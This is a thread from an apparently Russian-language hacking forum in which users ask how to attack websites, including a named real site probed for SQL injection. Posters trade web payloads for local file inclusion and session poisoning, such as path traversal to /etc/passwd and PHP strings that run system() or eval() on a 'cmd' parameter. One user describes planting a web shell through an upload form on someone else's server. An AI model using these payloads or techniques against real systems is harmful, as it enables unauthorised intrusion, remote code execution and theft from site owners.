Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Brutus AET2
     
  2. Radiator

    Radiator Active Member

    Joined:
    17 Mar 2009
    Messages:
    394
    Likes Received:
    143
    Reputations:
    24
    а такой вопрос что в хосте вставлять?
    это "http://forapro.ru/myadmin/"и все? тип запроса http ?
     
  3. m0Hze

    m0Hze Well-Known Member

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    655
    Reputations:
    208
    Кеп намекает
    Code:
    http://forapro.ru/?page_id=11%27
    
    Не тестил :(
     
  4. Radiator

    Radiator Active Member

    Joined:
    17 Mar 2009
    Messages:
    394
    Likes Received:
    143
    Reputations:
    24
    Mohze

    пасип...

    я думал,что http://forapro.ru/myadmin/ проще.

    ибо с sql-inj полный нолик))
     
    1 person likes this.
  5. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    просканировал директории сайта, все "админские " поддомены типа phpmyadmin.sait.ru;admin.sait.ru;cp.admin.ru ,а также все остальные пути типа sait.ru/admin;sait.ru/cpanel ну и т.д. выдают один и тот же резуотат:
    Great Success !
    Apache is working on your cPanel® and WHM™ Server

    If you can see this page, then the people who manage this server have installed cPanel and WebHost Manager (WHM) which use the Apache Web server software and the Apache Interface to OpenSSL (mod_ssl) successfully. They now have to add content to this directory and replace this placeholder page, or else point the server at their real content.

    Что с этим апачем делать?
     
  6. m0Hze

    m0Hze Well-Known Member

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    655
    Reputations:
    208
    Скорее всего это реакция апача на несуществующую папку,или же апач только установили и он больше пока ничего не умеет.Кагбе дефаулт-паге показывает.
     
  7. Hofs

    Hofs New Member

    Joined:
    3 Aug 2009
    Messages:
    0
    Likes Received:
    2
    Reputations:
    0
    Боюсь что даже запрос вида:
    hf21y572jakdjasd84128142148uafduuasfuafa.sait.ru - выдаст тот же самый Соксесс)
     
    1 person likes this.
  8. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    странно, что сканер тогда выдал директории эти. В этом случае админку нереально найти?
    П.С. На самом сайте формочек входа нет(
     
  9. Hofs

    Hofs New Member

    Joined:
    3 Aug 2009
    Messages:
    0
    Likes Received:
    2
    Reputations:
    0
    Сканер будет себя вести не совсем адекватно,ибо его то туда пускает - вот он тебе и выдает что директория/субдомен существует.
    Надо добавить в файл Ерорс уникальных слов с страницы апача,и тогда эти странички будет отфильтровывать как несуществующие ;)

    Если речь идет конечно не о секурти дигер )
     
  10. GenTao

    GenTao New Member

    Joined:
    10 Oct 2009
    Messages:
    123
    Likes Received:
    2
    Reputations:
    -3
    Подрубил шелл через инклуд(имя файла генерится в виде хэша).Всё нормально,вот только по шеллу не побегаешь - не даёт исполнять команды.Приходится заливать каждый раз рнр скрипт с system() (не особо-то и важно) функцией для исполнения коанд.Выходит,что чтобы пробежаться по всем дирам ,нужно залить скрипт столько раз,сколько и директорий на сервере(или же заюзать рекурсивные запросы).Возможно ли избежать этого ? И,соответственно,как это осуществить ? Я уже не говорю об использовании полноценных шеллов - хотя бы исполнение команд через суперглобальные переменные,а то конкретно задолбало...
    Забыл также упомянуть,что просто залить .php скрипт не получится - код просто выводится,вследствие чего можно заключить,что рнр код шелла не исполняется(оно и логично)... в директории,куда заливаю шелл.Написал я это потому,что иногда прокатывает - нашёл форму аплоада,а там бац - и всё.Можно лить...)
     
    #10750 GenTao, 22 Dec 2009
    Last edited: 22 Dec 2009
  11. GenTao

    GenTao New Member

    Joined:
    10 Oct 2009
    Messages:
    123
    Likes Received:
    2
    Reputations:
    -3
    Также интересует,как залить шелл с помощью метода инклуда сессий,описанного здесь:

    _http://ahacc.ru/forum/showthread.php?t=27


    "Подменив эти данные на нужный php-код и заинклудив сессию, мы поимеем шелл." - Каким образом подменить и ГДЕ ? Единственное,что приходит на ум - Отправка заголовка COOKIE: PHPSESSID=<?evilcode?> в НТТР запросе.Но ведь не засунешь же туда весь код шелла ?
    Как результат должен проинклудиться шелл,я так понял.
     
  12. [х26]VОLАND

    [х26]VОLАND Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    513
    Likes Received:
    756
    Reputations:
    218
    Нужно подменить какую-нибудь переменную, которая записывается в сессию. Например, в некоторых движках при авторизации имя пользователя сохраняется в сессию. Таким образом, если есть возможность, мы можем вписать в имя пользователя php-код, который в свою очередь запишется в сессию. Остаётся только проинклудить её.
     
  13. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    смотри допустим найшол ты уязвимый параметр:
    page=
    пишеш
    page=../../../../../../etc/passwd%00<? system($_GET['cmd']); ?>
    а потом просто подцепляеш из tmp co своей sess_
    ну типо так к примеру:)
    page=../../../../../../tmp/sess_23h4g23jh45g245v4jh%00&cmd=id
     
  14. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    2 547:

    мда...с логами не попутал? Причем здесь сессия и твой первый запрос

    page=../../../../../../etc/passwd%00<? system($_GET['cmd']); ?>

    ????

    Объясни связь ламеру
     
  15. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    Толку инклудить сессию,сначала надо в неё код что бы записался.
     
  16. m0Hze

    m0Hze Well-Known Member

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    655
    Reputations:
    208
    page=../../../../../../etc/passwd%00<? system($_GET['cmd']); ?>
    Что ты хотел этм сказать? Каким образом строка из гет,попадет в сессию? Причом тут инклуд вообще,если ты хочеш просто вписат ьв сессию данные.Ты либо путаеш логи апача с сессиями,либо я вообще ниразу не знаю php :/
     
  17. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Чел просто слышал звон но не знет где он.

    Если параметр page пишется в сессию, то достаточно вот этого:
    Code:
    page=<? eval($_REQUEST['cmd']); ?>
    Ну и потом инклудить сессию. А лабуда с etc/passwd тут вообще не при чём.
     
    2 people like this.
  18. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Qwazar

    а если не пишется (чото даже ни разу такого не встречал), то вот это почитайте к примеру:

    https://forum.antichat.ru/thread119481.html

    т.е. как бы для начала надо посмотреть, что вообще пишется в сессию, для начала, как у гостя, так и после регистрации (если есть регистрация)
     
    1 person likes this.
  19. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    иногда в сессию пишется поледний посещенный юрл, но это очень редко
     
  20. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Тоже катит, разумеется, но /etc/passw%00 - тут просто лишний текст в нагрузку. Для инклуда, он не является ни необходимым ни хоть сколько нибудь полезным.
    Встречал случаи, когда в сессию пишется туча разного бреда, в том числе и некоторые входящие параметры. И при этом не заинклудить ни логи, ни что либо ещё, кроме сессии и файлов движка.
     
Thread Status:
Not open for further replies.